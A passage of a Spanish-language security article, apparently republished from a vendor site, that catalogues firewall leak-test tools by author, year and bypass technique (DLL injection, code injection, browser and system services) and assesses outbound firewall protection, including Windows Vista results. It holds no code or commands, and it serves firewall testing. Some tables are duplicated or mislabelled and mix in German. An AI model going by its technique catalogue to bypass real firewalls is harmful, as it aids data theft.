1 AWFT [6] José Pascoa Inyección de códigos 2005
2 BITSTester Tim Fish Servicios del sistema 2006
3 Breakout Volker Birk Servicios del navegador Datos no disponibles
4 Breakout2 Volker Birk Servicios del sistema Datos no disponibles
5 Coat David Matousec Sustitución 2006
6 CopyCat «Bugsbunny» Inyección de códigos Datos no disponibles
7 CPIL Comodo Inyección de códigos 2006
8.1 CPILSuite [1] Comodo Inyección de códigos + Lanzamiento 2006
8.2 CPILSuite [2] Comodo Inyección DLL + Lanzamiento 2006
8.3 CPILSuite [3] Comodo Inyección DLL + Servicios del navegador 2006
9 DNStest Jarkko Turkulainen Inyección de códigos 2004
10 DNStest Jarkko Turkulainen Servicios del sistema 2004
11 FireHole Robin Keir Inyección DLL 2002
12 FPR (38) David Matousec Cese de la intercepción (unhooking) keine Angabe
13 Ghost Guillaume Kaddouch Lanzamiento keine Angabe
14 Jumper Guillaume Kaddouch Inyección DLL 2006
15 LeakTest Steve Gibson Sustitución 2002
16 OSfwbypass Debasis Mohanty Servicios del navegador 2005
17 pcAudit Internet Security Alliance Inyección DLL 2002
18 pcAudit2 Internet Security Alliance Inyección DLL Datos no disponibles
19 PCFlank www.pcflank.com Servicios del navegador 2006
20 Runner David Matousec Sustitución 2006
21 Surfer Jarkko Turkulainen Servicios del navegador 2004
22 Thermite Oliver Lavery Inyección de códigos 2003
23 TooLeaky Bob Sundling Lanzamiento 2001
24 Wallbreaker [4] Guillaume Kaddouch Lanzamiento 2004
25 YALTA Soft4ever Reglas por defecto 2001
26 ZAbypass Debasis Mohanty Servicios del navegador 2005

En la siguiente tabla se muestran las categorías de pruebas de fugas según nuestra clasificación:

№№ Tecnología Pruebas de fugas
1 Sustitución Coat, LeakTest, Runner
2 Lanzamiento Ghost, TooLeaky, Wallbreaker
3 Inyección DLL CPILSuite [2, 3], FireHole, Jumper, pcAudit, pcAudit2
4 Inyección de códigos AWFT, CopyCat, CPIL, CPILSuite [1], DNStest, Thermite
5 Servicios del navegador Breakout, OSfwbypass, PCFlank, Surfer, ZAbypass
6 Servicios del sistema BITSTester, Breakout2, DNStester

Interpretación de los resultados de las pruebas de fugas

¿Qué beneficios ofrecen las pruebas de fugas en las pruebas comparativas de cortafuegos que las usan? Ante todo, estas pruebas ayudan a determinar la calidad integral de la protección y facilitan la elección de un sistema integrado para la protección del ordenador del usuario.

Al escoger un sistema de protección para su ordenador personal, el usuario a menudo se fija sólo en características como el nivel de detección del producto y el tiempo de respuesta a nuevas amenazas (por ejemplo, en base a los resultados de las pruebas que conducen http://www.av-comparatives.org y http://www.av-test.de). Sin embargo, esto no es suficiente para determinar la calidad de los modernos sistemas de protección. La calidad del componente proactivo incluido en las soluciones antivirus, la efectividad con la que se tratan los ordenadores infectados, la habilidad para combatir rootkits activos, y la calidad de autoprotección garantizadas por cada producto son otras características que revisten igual importancia, pero a las que los autores de pruebas comparativas no les dan la atención que se merecen. Al seleccionar un producto de seguridad integrada, también se debería analizar otros componentes adicionales como un sistema antispam y un cortafuegos.

Tal como se dijo líneas arriba, hay dos criterios para juzgar la calidad de la protección brindada por un cortafuegos: el control de los datos entrantes y el control de los datos salientes. Un buen rendimiento en las pruebas de control de datos salientes significa que el cortafuegos no es un mero componente de relleno en un producto antivirus, sino que brinda un nivel adicional de protección capaz de prevenir que los datos confidenciales del usuario sean enviados a delincuentes cibernéticos, incluso si los componentes antivirus fracasan al neutralizar un programa troyano.

Creemos que los productos que recibieron las calificaciones de Muy Bueno y Excelente en las pruebas de fugas conducidas por http://www.matousec.com/projects/windows-personal-firewall-analysis/leak-tests-results.php brindan adecuada protección al usuario. Si la protección brindada por un producto recibió la calificación Bueno, o peor aún, Pobre o Muy Pobre, significa que los autores de programas maliciosos pueden vulnerar, mediante cualquier método, el cortafuegos incluido en el producto.

Conclusiones

Hoy en día, un cortafuegos es un componente indispensable en los sistemas integrados de seguridad informática. Aun los más modernos sistemas operativos, como Windows Vista, no pueden bloquear por sí mismos todos los tipos de fugas (aunque desde Windows XP SP2, Windows ha venido introduciendo un cortafuegos cuya funcionalidad se ha incrementado de manera significativa en Windows Vista).

Según los resultados de una prueba que Guillaume Kaddouch condujo en marzo de 2007 (http://www.firewallleaktester.com/articles/vista_and_leaktests.html), Windows Vista Ultimate 64-bit bloqueó sólo 9 pruebas de fugas con su configuración predeterminada (las pruebas de fugas bloqueadas aparecen en verde en la tabla de resultados).

№№ Nombre Notas
1 Sustitución Coat, LeakTest, Runner
2 Lanzamiento Ghost, TooLeaky, Wallbreaker
3 Inyección DLL CPILSuite [2, 3], FireHole, Jumper, pcAudit, pcAudit2
4 Inyección de códigos AWFT, CopyCat, CPIL, CPILSuite [1], DNStest, Thermite
5 Servicios del navegador Breakout, OSfwbypass, PCFlank, Surfer, ZAbypass
6 Servicios del sistema BITSTester, Breakout2, DNStester

El nuevo sistema operativo está a todas luces mejor protegido gracias a numerosas mejoras, incluyendo UAC, IE modo protegido, Service hardening y Kernel Patch protection (Vista x64). Sin embargo, incluso Windows Vista necesita protección de terceras partes para lograr el nivel necesario de protección contra fugas.

En el futuro, los programas maliciosos recurrirán a nuevos métodos para vulnerar los mecanismos de protección del nuevo sistema operativo y los mecanismos de protección existentes. Esta es la razón por la que la función del cortafuegos como un nivel adicional de protección continuará cobrando importancia. Resulta evidente que los autores de programas maliciosos no cesarán en el uso de tecnologías de fugas para vulnerar los cortafuegos. Esto significa que las pruebas de fugas se convertirán en un método crucial para comprobar la confiabilidad de la protección de un ordenador.

Fuente: http://www.viruslist.com/sp/analysis?pubid=207270960

Ver más